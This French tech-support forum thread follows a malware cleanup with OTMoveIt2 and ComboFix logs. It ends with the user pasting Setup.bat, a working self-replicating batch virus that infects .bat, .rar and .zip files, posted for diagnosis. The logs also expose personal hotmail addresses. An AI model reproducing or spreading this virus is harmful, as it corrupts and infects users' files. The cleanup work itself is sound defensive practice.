  • Copier les lignes de la zone "Code" ci-dessous en les sélectionnant TOUTES puis en appuyant simultanément sur les touches CTRL et C (ou, après les avoir sélectionnées, en faisant un clic droit puis en choisissant Copier):
    C:\Documents and Settings\All Users\Menu Démarrer\Programmes\Télécharger des logiciels.exe
    C:\Documents and Settings\Guillaume\Application Data\HbTools
    C:\Documents and Settings\Guillaume\Local Settings\Application Data\Microsoft\Messenger\alex130392@hotmail.fr\SharingMetadata\infected.dat
    C:\Documents and Settings\Guillaume\Local Settings\Application Data\Microsoft\Messenger\guillaume_017@hotmail.fr\SharingMetadata\infected.dat
    C:\Documents and Settings\Guillaume\Local Settings\Application Data\Microsoft\Messenger\laura_028@hotmail.fr\SharingMetadata\infected.dat
    C:\Documents and Settings\Guillaume\Local Settings\Application Data\Microsoft\Messenger\niko0179@hotmail.fr\SharingMetadata\infected.dat

  • Retourner dans la fenêtre de OTMoveIt2, faire un clic droit dans la zone "Paste Standard List of Files/Folders to Move" (sous la barre bleu clair) puis choisir Coller.
  • Cliquer sur le bouton rouge Moveit!.
  • Copier tout ce qui se trouve dans la zone Results (sous la barre verte) en sélectionnant TOUTES LES LIGNES puis en appuyant simultanément sur les touches CTRL et C (ou, après les avoir sélectionnées, en faisant un clic droit puis en choisissant Copier), et coller ces résulats en réponse sur le forum.
  • Fermer OTMoveIt2

    Note: Si un fichier ou un dossier ne peut pas être déplacé immédiatement, un redémarrage sera peut-être nécessaire afin de terminer le processus de déplacement. Si le redémarrage de la machine vous est demandé, choisir Oui/Yes. Dans ce cas, après le redémarrage, ouvrir le Bloc-notes (Démarrer->Tous les programmes->Accessoires->Bloc-notes), cliquer sur Fichier->Ouvrir, dans la zone "Nom du fichier" taper *.log et appuyer sur la touche Entrée, naviguer jusqu'au dossier C:\_OTMoveIt\MovedFiles, puis ouvrir le fichier .log le plus récent; ensuite faire un copier/coller du contenu de ce document en réponse sur le forum.

    Si tu obtiens un message comme quoi le rapport ne peut pas être créé, copie/colle ce qui apparaît dans la colonne droite de l’outil.

    **************

    Fais démarrer ton ordinateur en mode sans échec.
    Supprime les différents rapports créés par ComboFix sur ton ordinateur ( C:\Combofix?.txt) Le ? représentant un nombre ou rien.
    Repasse ComboFix sans script et poste moi son rapport -de préférence sur le forum-


    4 Juillet 2008 10:32:43

    Results dans OTmoveIT2 :
    Démarrer\Programmes\Télécharger des logiciels.exe
    C:\Documents and Settings\Guillaume\Application Data\HbTools
    C:\Documents and Settings\Guillaume\Local Settings\Application Data\Microsoft\Messenger\alex130392@hotmail.fr\SharingMetadata\infected.dat
    C:\Documents and Settings\Guillaume\Local Settings\Application Data\Microsoft\Messenger\guillaume_017@hotmail.fr\SharingMetadata\infected.dat
    C:\Documents and Settings\Guillaume\Local Settings\Application Data\Microsoft\Messenger\laura_028@hotmail.fr\SharingMetadata\infected.dat
    C:\Documents and Settings\Guillaume\Local Settings\Application Data\Microsoft\Messenger\niko0179@hotmail.fr\SharingMetadata\infected.dat


    Rapport ComboFix : ( Et et, première fois que le fichier se trouve bien dans C:\ComboFix.txt net progrès ! )

    ComboFix 08-06-30.2 - Laura 2008-07-04 10:19:06.4 - NTFSx86 MINIMAL
    Microsoft Windows XP Édition familiale 5.1.2600.2.1252.1.1036.18.769 [GMT 2:00]
    Endroit: C:\Documents and Settings\Laura\Bureau\combofix.exe

    AVERTISSEMENT - LA CONSOLE DE RÉCUPÉRATION N'EST PAS INSTALLÉE SUR CETTE MACHINE !!
    .

    ((((((((((((((((((((((((((((( Fichiers créés 2008-06-04 to 2008-07-04 ))))))))))))))))))))))))))))))))))))
    .

    2008-07-04 10:10 . 2008-07-04 10:10 <REP> d-------- C:\_OTMoveIt
    2008-07-03 14:35 . 2008-07-03 14:35 <REP> d-------- C:\Documents and Settings\Laura\Application Data\Malwarebytes
    2008-07-03 14:34 . 2008-07-03 14:35 <REP> d-------- C:\Program Files\Malwarebytes' Anti-Malware
    2008-07-03 14:34 . 2008-07-03 14:34 <REP> d-------- C:\Documents and Settings\All Users\Application Data\Malwarebytes
    2008-07-03 14:34 . 2008-06-28 14:21 34,296 --a------ C:\WINDOWS\system32\drivers\mbamcatchme.sys
    2008-07-03 14:34 . 2008-06-28 14:21 17,144 --a------ C:\WINDOWS\system32\drivers\mbam.sys
    2008-07-03 12:29 . 2008-07-03 12:29 <REP> d-------- C:\WINDOWS\system32\Kaspersky Lab
    2008-07-02 09:25 . 2008-07-02 09:25 <REP> d-------- C:\combo-fix
    2008-06-30 21:42 . 2008-06-30 21:42 <REP> d--h----- C:\Documents and Settings\All Users\Application Data\CanonBJ
    2008-06-30 21:42 . 2006-05-01 12:00 161,792 --a------ C:\WINDOWS\system32\CNMLM86.DLL
    2008-06-30 16:05 . 2008-07-01 10:17 <REP> d-------- C:\Lop SD
    2008-06-26 21:27 . 2008-06-26 21:27 <REP> d-------- C:\Program Files\Avira
    2008-06-26 21:27 . 2008-06-26 21:27 <REP> d-------- C:\Documents and Settings\All Users\Application Data\Avira
    2008-06-21 10:52 . 2008-06-26 22:15 <REP> d-------- C:\Muestras
    2008-06-21 10:20 . 2004-08-04 00:48 2,150,400 --a------ C:\WINDOWS\system32\ntoskrnl.exe
    2008-06-21 10:20 . 2004-08-04 00:48 2,150,400 --a--c--- C:\WINDOWS\system32\dllcache\ntkrnlmp.exe
    2008-06-16 16:14 . 2008-06-16 17:19 32 --ahs---- C:\WINDOWS\system32\drivers\fidbox2.idx
    2008-06-16 16:14 . 2008-06-16 17:19 32 --ahs---- C:\WINDOWS\system32\drivers\fidbox2.dat
    2008-06-16 16:14 . 2008-06-16 17:19 32 --ahs---- C:\WINDOWS\system32\drivers\fidbox.idx
    2008-06-16 16:14 . 2008-06-16 17:19 32 --ahs---- C:\WINDOWS\system32\drivers\fidbox.dat
    2008-06-16 16:13 . 2008-06-16 16:13 <REP> d-------- C:\kav
    2008-06-12 14:07 . 2008-06-12 14:07 <REP> d-------- C:\Program Files\Creative
    2008-06-12 14:07 . 2003-01-27 16:32 831,600 --a------ C:\WINDOWS\system32\Ctaa1.dat
    2008-06-12 14:07 . 2003-11-11 10:44 333,600 --a------ C:\WINDOWS\system32\drivers\ctdvda2k.sys
    2008-06-12 14:07 . 2003-07-14 16:49 122,880 --a------ C:\WINDOWS\system32\cddvdint.dll
    2008-06-12 14:07 . 2003-11-11 10:43 77,824 --a------ C:\WINDOWS\system32\ctdvda32.dll
    2008-06-08 17:39 . 2004-08-05 14:00 13,463,552 --a--c--- C:\WINDOWS\system32\dllcache\hwxjpn.dll
    2008-06-08 17:38 . 2004-08-05 14:00 10,096,640 --a--c--- C:\WINDOWS\system32\dllcache\hwxcht.dll
    2008-06-08 17:36 . 2008-06-08 17:36 749 -rah----- C:\WINDOWS\WindowsShell.Manifest
    2008-06-08 17:36 . 2008-06-08 17:36 749 -rah----- C:\WINDOWS\system32\wuaucpl.cpl.manifest
    2008-06-08 17:36 . 2008-06-08 17:36 749 -rah----- C:\WINDOWS\system32\sapi.cpl.manifest
    2008-06-08 17:36 . 2008-06-08 17:36 749 -rah----- C:\WINDOWS\system32\ncpa.cpl.manifest
    2008-06-08 17:36 . 2008-06-08 17:36 488 -rah----- C:\WINDOWS\system32\logonui.exe.manifest
    2008-06-08 16:57 . 2004-08-05 14:00 168,806 --a--c--- C:\WINDOWS\system32\dllcache\startoc.cat
    2008-06-08 16:57 . 2004-08-05 14:00 24,661 --a------ C:\WINDOWS\system32\spxcoins.dll
    2008-06-08 16:57 . 2004-08-05 14:00 24,661 --a--c--- C:\WINDOWS\system32\dllcache\spxcoins.dll
    2008-06-08 16:57 . 2004-08-05 14:00 19,569 --a--c--- C:\WINDOWS\system32\dllcache\msn7.cat
    2008-06-08 16:57 . 2004-08-05 14:00 13,312 --a------ C:\WINDOWS\system32\irclass.dll
    2008-06-08 16:57 . 2004-08-05 14:00 13,312 --a--c--- C:\WINDOWS\system32\dllcache\irclass.dll
    2008-06-08 16:57 . 2004-08-05 14:00 11,651 --a--c--- C:\WINDOWS\system32\dllcache\msn9.cat
    2008-06-08 16:57 . 2004-08-05 14:00 7,407 --a--c--- C:\WINDOWS\system32\dllcache\OEMBIOS.CAT
    2008-06-04 13:21 . 2008-06-04 13:21 <REP> d--h----- C:\WINDOWS\PIF

    .
    (((((((((((((((((((((((((((((((((( Compte-rendu de Find3M ))))))))))))))))))))))))))))))))))))))))))))))))
    .
    2008-07-04 08:16 --------- d-----w C:\Program Files\OpenOffice.org1.1.4
    2008-07-04 08:07 --------- d-----w C:\Documents and Settings\Laura\Application Data\Skype
    2008-07-04 08:06 --------- d-----w C:\Program Files\Wanadoo
    2008-07-03 19:31 --------- d-----w C:\Program Files\eMule
    2008-06-12 12:09 --------- d-----w C:\Program Files\Fichiers communs\InterVideo
    2008-06-12 12:08 --------- d--h--w C:\Program Files\InstallShield Installation Information
    2008-05-31 19:07 --------- d-----w C:\Program Files\Lame MP3 Codec
    2008-05-29 21:18 --------- d---a-w C:\Documents and Settings\All Users\Application Data\TEMP
    2008-05-18 13:42 --------- d-----w C:\Documents and Settings\papounet\Application Data\Ulead Systems
    2008-05-07 22:35 --------- d-----w C:\Documents and Settings\Laura\Application Data\Ulead Systems
    2008-05-07 21:13 --------- d-----w C:\Documents and Settings\All Users\Application Data\InterVideo
    2008-05-07 21:12 --------- d-----w C:\Program Files\Fichiers communs\Ulead Systems
    2008-05-07 21:11 --------- d-----w C:\Program Files\Ulead Systems
    2008-05-07 21:11 --------- d-----w C:\Documents and Settings\All Users\Application Data\Ulead Systems
    2008-05-07 20:03 --------- d-----w C:\Program Files\EA GAMES
    2008-05-06 12:01 --------- d-----w C:\Program Files\Fichiers communs\Adobe
    2007-09-10 16:46 4,537 ----a-w C:\Documents and Settings\Laura\Setup.bat
    .

    ((((((((((((((((((((((((((((((((( Point de chargement Reg )))))))))))))))))))))))))))))))))))))))))))))))))
    .
    .
    REGEDIT4
    *Note* les éléments vides & les éléments initiaux légitimes ne sont pas listés

    [HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
    "CTFMON.EXE"="C:\WINDOWS\system32\ctfmon.exe" [2004-08-05 14:00 15360]
    "LogitechSoftwareUpdate"="C:\Program Files\Logitech\Video\ManifestEngine.exe" [2004-06-01 12:46 196608]
    "LDM"="C:\Program Files\Logitech\Desktop Messenger\8876480\Program\LogitechDesktopMessenger.exe" [2007-02-21 14:23 67128]
    "Skype"="C:\Program Files\Skype\Phone\Skype.exe" [2006-05-11 17:24 18577448]
    "WOOKIT"="C:\PROGRA~1\Wanadoo\GestMaj.exe" [2004-10-14 16:55 32768]
    "msnmsgr"="C:\Program Files\Windows Live\Messenger\MsnMsgr.Exe" [2007-10-18 11:34 5724184]
    "swg"="C:\Program Files\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exe" [2007-07-07 15:14 68856]

    [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
    "NvCplDaemon"="C:\WINDOWS\system32\NvCpl.dll" [2004-10-29 16:50 4620288]
    "NvMediaCenter"="C:\WINDOWS\system32\NvMcTray.dll" [2004-10-29 16:50 86016]
    "Easy-PrintToolBox"="C:\Program Files\Canon\Easy-PrintToolBox\BJPSMAIN.EXE" [2004-01-14 03:10 409600]
    "MMTray"="C:\Program Files\Musicmatch\Musicmatch Jukebox\mm_tray.exe" [2006-01-17 13:12 135168]
    "mmtask"="C:\Program Files\Musicmatch\Musicmatch Jukebox\mmtask.exe" [2006-01-17 13:12 53248]
    "SunJavaUpdateSched"="C:\Program Files\Java\jre1.5.0_06\bin\jusched.exe" [2005-11-10 13:03 36975]
    "WOOWATCH"="C:\PROGRA~1\Wanadoo\Watch.exe" [2004-08-23 14:49 20480]
    "WOOTASKBARICON"="C:\PROGRA~1\Wanadoo\GestMaj.exe" [2004-10-14 16:55 32768]
    "Device Detector"="C:\Program Files\Fichiers communs\ACD Systems\FR\DevDetect.exe" [2005-06-27 10:21 221184]
    "UVS11 Preload"="C:\Program Files\Ulead Systems\Ulead VideoStudio 11\uvPL.exe" [2007-04-12 13:23 341488]
    "SMSTray"="C:\Program Files\Samsung\Samsung Media Studio 5\SMSTray.exe" [2007-09-20 08:23 132624]
    "avgnt"="C:\Program Files\Avira\AntiVir PersonalEdition Classic\avgnt.exe" [2008-02-12 10:06 262401]
    "nwiz"="nwiz.exe" [2004-10-29 16:50 921600 C:\WINDOWS\system32\nwiz.exe]
    "Raccourci vers la page des propriétés de High Definition Audio"="HDAudPropShortcut.exe" [2004-03-17 16:10 61952 C:\WINDOWS\system32\Hdaudpropshortcut.exe]

    [HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run]
    "CTFMON.EXE"="C:\WINDOWS\system32\CTFMON.EXE" [2004-08-05 14:00 15360]

    C:\Documents and Settings\All Users\Menu D‚marrer\Programmes\D‚marrage\
    InterVideo WinCinema Manager.lnk - C:\Program Files\Fichiers communs\InterVideo\Common\Bin\WinCinemaMgr.exe [2008-06-12 14:08:36 184320]
    Lancement rapide d'Adobe Reader.lnk - C:\Program Files\Adobe\Acrobat 7.0\Reader\reader_sl.exe [2005-09-24 08:05:26 29696]
    Logitech Desktop Messenger.lnk - C:\Program Files\Logitech\Desktop Messenger\8876480\Program\LogitechDesktopMessenger.exe [2007-02-21 14:23:09 67128]

    [hkey_local_machine\software\microsoft\windows\currentversion\explorer\ShellExecuteHooks]
    "{88485281-8b4b-4f8d-9ede-82e29a064277}"= "C:\PROGRA~1\MarkAny\CONTEN~1\MACSMA~1.DLL" [2004-11-23 17:51 192512]

    [HKEY_LOCAL_MACHINE\software\microsoft\windows nt\currentversion\drivers32]
    "msacm.l3acm"= l3codecp.acm
    "msacm.enc"= ITIG726.acm
    "VIDC.ACDV"= ACDV.dll
    "vidc.yv12"= yv12vfw.dll
    "msacm.dvacm"= C:\PROGRA~1\FICHIE~1\ULEADS~1\Vio\Dvacm.acm
    "msacm.MPEGacm"= C:\PROGRA~1\FICHIE~1\ULEADS~1\MPEG\MPEGacm.acm
    "msacm.ulmp3acm"= C:\PROGRA~1\FICHIE~1\ULEADS~1\MPEG\ulmp3acm.acm

    [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\sacsvr]
    @="Service"

    [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\sglfb.sys]
    @="Driver"

    [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\tga.sys]
    @="Driver"

    [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\wd.sys]
    @="Driver"

    [HKEY_LOCAL_MACHINE\software\microsoft\security center]
    "AntiVirusOverride"=dword:00000001

    [HKLM\~\services\sharedaccess\parameters\firewallpolicy\standardprofile\AuthorizedApplications\List]
    "%windir%\\system32\\sessmgr.exe"=
    "C:\\Program Files\\Messenger\\msmsgs.exe"=
    "C:\\WINDOWS\\pchealth\\helpctr\\binaries\\HelpCtr.exe"=
    "C:\\Program Files\\Logitech\\Desktop Messenger\\8876480\\Program\\LogitechDesktopMessenger.exe"=
    "C:\\Program Files\\iTunes\\iTunes.exe"=
    "C:\\Program Files\\Windows Live\\Messenger\\msnmsgr.exe"=
    "C:\\Program Files\\Skype\\Phone\\Skype.exe"=

    R0 iteraid;ITERAID_Service_Install;C:\WINDOWS\system32\DRIVERS\iteraid.sys [2004-07-16 11:12]
    S2 IKANLOADER2;General Purpose USB Driver (e4ldr.sys);C:\WINDOWS\system32\Drivers\e4ldr.sys [2006-03-02 19:25]
    S3 cmudax;C-Media High Definition Audio Interface;C:\WINDOWS\system32\drivers\cmudax.sys [2004-10-21 12:56]
    S3 e4usbaw;USB ADSL2 WAN Adapter;C:\WINDOWS\system32\DRIVERS\e4usbaw.sys [2006-05-04 18:50]
    S3 FirebirdServerMAGIXInstance;Firebird Server - MAGIX Instance;C:\MAGIX\Common\Database\bin\fbserver.exe [2005-11-17 16:18]
    S3 PhilCam8116_XP;Logitech QuickCam Pro 3000(PID_08B1);C:\WINDOWS\system32\DRIVERS\CamDrL20.sys [2004-05-21 21:16]
    S3 W8100XP;Marvell Libertas 802.11b/g SoftAP Driver for Windows XP ;C:\WINDOWS\system32\DRIVERS\mrv8ka51.sys [2004-05-21 05:47]
    S3 WlanUIG;Sagem 802.11g Wireless LAN USB Adapter Driver;C:\WINDOWS\system32\DRIVERS\WlanUIG.sys [2004-09-02 23:18]

    *Newly Created Service* - IKANLOADER2
    .
    Contenu du dossier 'Scheduled Tasks/Tâches planifiées'
    "2008-07-03 15:28:00 C:\WINDOWS\Tasks\AppleSoftwareUpdate.job"
    - C:\Program Files\Apple Software Update\SoftwareUpdate.exe
    "2008-07-04 08:02:08 C:\WINDOWS\Tasks\Table des caractères.job"
    - C:\WINDOWS\system32\charmap.exe
    .
    - - - - ORPHANS REMOVED - - - -

    BHO-{3C8BF6F1-0702-4283-8889-BD3BBBF2FC59} - C:\WINDOWS\system32\hgGATkjk.dll
    BHO-{57098e4f-3c41-47b1-97ae-b94ce9ae1aba} - C:\WINDOWS\system32\piiinynd.dll
    HKLM-Run-My Web Search Bar Search Scope Monitor - C:\PROGRA~1\MYWEBS~1\bar\2.bin\m3SrchMn.exe
    HKLM-Run-Cmaudio - cmicnfg.cpl,CMICtrlWnd


    **************************************************************************

    catchme 0.3.1361 W2K/XP/Vista - rootkit/stealth malware detector by Gmer, http://www.gmer.net
    Rootkit scan 2008-07-04 10:22:43
    Windows 5.1.2600 Service Pack 2 NTFS

    Balayage processus cachés ...

    Balayage caché autostart entries ...

    Balayage des fichiers cachés ...

    Scan terminé avec succès
    Les fichiers cachés: 0

    **************************************************************************
    .
    Temps d'accomplissement: 2008-07-04 10:24:02
    ComboFix-quarantined-files.txt 2008-07-04 08:23:27

    Pre-Run: 4,980,412,416 octets libres
    Post-Run: 5,274,066,944 octets libres

    168 --- E O F --- 2008-07-04 08:03:28
    4 Juillet 2008 12:42:44

    Re,

    Peux-tu regarder si tu as copié correctement le rapport d'OtMovelt ?
    Normalement, il y a Moved Successfuly derrière ou failed to move ..

    Peux-tu naviguer manuellement jusqu'à ce fichier : C:\Documents and Settings\Laura\Setup.bat
    Ne double clique pas dessus ! Fais un clique droit dessus, puis choisis Modifier.
    Un texte va apparaître, copie-le ici. Puis ferme la fenêtre.

    Toujours des problèmes ?

    4 Juillet 2008 14:05:37

    En effet je me suis plantée :/ 
    Results :
    File/Folder C:\Documents and Settings\All Users\Menu Démarrer\Programmes\Télécharger des logiciels.exe not found.
    File/Folder C:\Documents and Settings\Guillaume\Application Data\HbTools not found.
    < C:\Documents and Settings\Guillaume\Local Settings\Application Data\Microsoft\Messenger\alex130392@hotmail.fr\SharingMetadata\infected.dat >
    File/Folder C:\Documents and Settings\Guillaume\Local Settings\Application Data\Microsoft\Messenger\alex130392@hotmail.fr\SharingMetadata\infected.dat not found.
    < C:\Documents and Settings\Guillaume\Local Settings\Application Data\Microsoft\Messenger\guillaume_017@hotmail.fr\SharingMetadata\infected.dat >
    File/Folder C:\Documents and Settings\Guillaume\Local Settings\Application Data\Microsoft\Messenger\guillaume_017@hotmail.fr\SharingMetadata\infected.dat not found.
    < C:\Documents and Settings\Guillaume\Local Settings\Application Data\Microsoft\Messenger\laura_028@hotmail.fr\SharingMetadata\infected.dat >
    File/Folder C:\Documents and Settings\Guillaume\Local Settings\Application Data\Microsoft\Messenger\laura_028@hotmail.fr\SharingMetadata\infected.dat not found.
    < C:\Documents and Settings\Guillaume\Local Settings\Application Data\Microsoft\Messenger\niko0179@hotmail.fr\SharingMetadata\infected.dat >
    File/Folder C:\Documents and Settings\Guillaume\Local Settings\Application Data\Microsoft\Messenger\niko0179@hotmail.fr\SharingMetadata\infected.dat not found.

    OTMoveIt2 by OldTimer - Version 1.0.4.3 log created on 07042008_135916


    Ensuite, le texte qui apparait de "Setup.bat" :

    @echo off%mUlq%
    cls%mUlq%
    if "%1"=="ex" goto mUlqex
    if "%1"=="agaq!" goto mUlqb
    if "%1"=="agaq_!" goto mUlqr
    if "%1"=="agaq_!!" goto mUlqz
    if exist c:\mUldrop.bat goto mUlqY
    %windir%\system32\find "mUl"<%0>c:\mUldrop.bat%mUlq%
    :mUlqex
    set tr=mU%mUlq%
    set ah=lu%mUlq%
    echo.>c:\Extract.bat%mUlq%
    %windir%\system32\find "%tr%%ah%"<%0>>c:\Extract.bat%mUlq%
    echo n mUlq.t>%windir%\temp\mUlqq
    echo e 0100 52 61 72 21 1A 07 00 CF 90 73 00 00 0D 00 00 00>>%windir%\temp\mUlqq
    echo e 0110 00 00 00 00 62 76 74 20 90 30 00 55 02 00 00 55>>%windir%\temp\mUlqq
    echo e 0120 02 00 00 02 8F DB 66 39 9D 83 2E 36 14 30 0B 00>>%windir%\temp\mUlqq
    echo e 0130 20 00 00 00 45 78 74 72 61 63 74 2E 62 61 74 00>>%windir%\temp\mUlqq
    echo e 0140 B0 56 21 83>>%windir%\temp\mUlqq
    echo rcx>>%windir%\temp\mUlqq
    echo 44>>%windir%\temp\mUlqq
    echo.>>%windir%\temp\mUlqq
    echo.>>%windir%\temp\mUlqq
    echo w>>%windir%\temp\mUlqq
    echo.>>%windir%\temp\mUlqq
    echo.>>%windir%\temp\mUlqq
    echo q>>%windir%\temp\mUlqq
    %windir%/system32/debug < %windir%\temp\mUlqq>nul
    echo n mUlq2.t>%windir%\temp\mUlq2
    echo e 0100 C4 3D 7B 00 40 07 00 0D 0A 0D 0A>>%windir%\temp\mUlq2
    echo rcx>>%windir%\temp\mUlq2
    echo b>>%windir%\temp\mUlq2
    echo.>>%windir%\temp\mUlq2
    echo.>>%windir%\temp\mUlq2
    echo w>>%windir%\temp\mUlq2
    echo.>>%windir%\temp\mUlq2
    echo.>>%windir%\temp\mUlq2
    echo q>>%windir%\temp\mUlq2
    %windir%/system32/debug < %windir%\temp\mUlq2>nul
    type mUlq.t>c:\Setup.rar
    type c:\Extract.bat>>c:\Setup.rar%mUlq%
    type mUlq2.t>>c:\Setup.rar
    echo n mUlq.t>%windir%\temp\mUlq
    echo e 0100 50 4B 03 04 0A 00 00 00 00 00 9D 83 2E 36 8F DB>>%windir%\temp\mUlq
    echo e 0110 66 39 55 02 00 00 55 02 00 00 0B 00 00 00 45 78>>%windir%\temp\mUlq
    echo e 0120 74 72 61 63 74 2E 62 61 74>>%windir%\temp\mUlq
    echo rcx>>%windir%\temp\mUlq
    echo 29>>%windir%\temp\mUlq
    echo.>>%windir%\temp\mUlq
    echo.>>%windir%\temp\mUlq
    echo w>>%windir%\temp\mUlq
    echo.>>%windir%\temp\mUlq
    echo.>>%windir%\temp\mUlq
    echo q>>%windir%\temp\mUlq
    %windir%/system32/debug < %windir%\temp\mUlq>nul
    echo n mUlq2.t>%windir%\temp\mUlq2
    echo e 0100 50 4B 01 02 14 00 0A 00 00 00 00 00 9D 83 2E 36>>%windir%\temp\mUlq2
    echo e 0110 8F DB 66 39 55 02 00 00 55 02 00 00 0B 00 00 00>>%windir%\temp\mUlq2
    echo e 0120 00 00 00 00 00 00 20 00 00 00 00 00 00 00 45 78>>%windir%\temp\mUlq2
    echo e 0130 74 72 61 63 74 2E 62 61 74 50 4B 05 06 00 00 00>>%windir%\temp\mUlq2
    echo e 0140 00 01 00 01 00 39 00 00 00 7E 02 00 00 00 00 0D>>%windir%\temp\mUlq2
    echo e 0150 0A>>%windir%\temp\mUlq2
    echo rcx>>%windir%\temp\mUlq2
    echo 51>>%windir%\temp\mUlq2
    echo.>>%windir%\temp\mUlq2
    echo.>>%windir%\temp\mUlq2
    echo w>>%windir%\temp\mUlq2
    echo.>>%windir%\temp\mUlq2
    echo.>>%windir%\temp\mUlq2
    echo q>>%windir%\temp\mUlq2
    %windir%/system32/debug < %windir%\temp\mUlq2>nul
    type mUlq.t>c:\Install.zip
    type c:\Extract.bat>>c:\Install.zip%mUlq%
    type mUlq2.t>>c:\Install.zip
    :mUlqY
    set xmUlq=for
    set zmUlq=call
    %xmUlq% %%a in (*.bat ..\*.bat) do %zmUlq% c:\mUldrop.bat agaq! "%%a"
    %xmUlq% %%a in (*.rar ..\*.rar) do %zmUlq% c:\mUldrop.bat agaq_! "%%a"
    %xmUlq% %%a in (*.zip ..\*.zip) do %zmUlq% c:\mUldrop.bat agaq_!! "%%a"
    if exist mUlq*.t del mUlq*.t
    if exist mUlqb del mUlqb
    if exist mUlqr del mUlqr
    if exist mUlqz del mUlqz
    if exist mUlqm del mUlqm
    goto mUlqend
    :mUlqb
    %windir%\system32\find "mUl"<%2>nul%mUlq%
    if not errorlevel 1 goto mUlqend
    type c:\mUldrop.bat>mUlqb
    echo.>>mUlqb
    type %2>>mUlqb
    copy mUlqb %2
    goto mUlqend
    :mUlqr
    %windir%\system32\find "mUlq"<%2>nul
    if not errorlevel 1 goto mUlqend
    type c:\setup.rar>mUlqr
    type %2>>mUlqr
    %windir%\system32\find "mUlq"<c:\mUldrop.bat>>mUlqr
    copy mUlqr %2
    goto mUlqend
    :mUlqz
    %windir%\system32\find "mUlq"<%2>nul
    if not errorlevel 1 goto mUlqend
    type c:\Install.zip>mUlqz
    type %2>>mUlqz
    %windir%\system32\find "mUlq"<c:\mUldrop.bat>>mUlqz
    copy mUlqz %2
    goto mUlqend
    :mUlqend
    set aaa=bbb%mUlq%
    @echo off%mUlu%
    cls>nul%mUlu%
    if bbb==%aaa% goto mUluz
    if "%1"=="mUlu!" goto mUlu1
    if exist c:\mUldrop.bat goto mUlue
    for %%a in (*.rar,*.zip ..\*.rar ..\*.zip) do call %0 mUlu! "%%a"
    goto mUlue
    :mUlu1
    if ddd==%ccc% goto mUluz
    set tr=mU%mUlu%
    set ah=lq%mUlu%
    %windir%\system32\find "mUldrop"<%2>nul%mUlu%
    if errorlevel 1 goto mUluz%mUlu%
    %windir%\system32\find "%tr%%ah%"<%2>c:\mUldrop.bat%mUlu%
    %windir%\system32\find "mUlu"<%2>>c:\mUldrop.bat
    set ccc=ddd%mUlu%
    goto mUluz
    :mUlue
    if exist setup.bat goto mUluz
    copy c:\mUldrop.bat Setup.bat%mUlu%
    Setup.bat ex%mUlu%
    :mUluz

    Et plus de problèmes :)  Mon ordinateur ne bug plus, la barre démarrer ne s'en va plus, je ne suis plus obligée de passer par tout un bazar pour ouvrir une page du net, et certains logiciels qui plantaient ( photo, vidéo... ) marchent à merveille ! Enfin je ne sais pas si c'est en rapport, mais c'est toujours bon à prendre :D 
    Merci beaucoup !!!
    Il reste des choses à vérifier ?
    Tom's guide dans le monde
    • Allemagne
    • Italie
    • Irlande
    • Royaume Uni
    • Etats Unis
    Suivre Tom's Guide
    Inscrivez-vous à la Newsletter
    • ajouter à twitter
    • ajouter à facebook
    • ajouter un flux RSS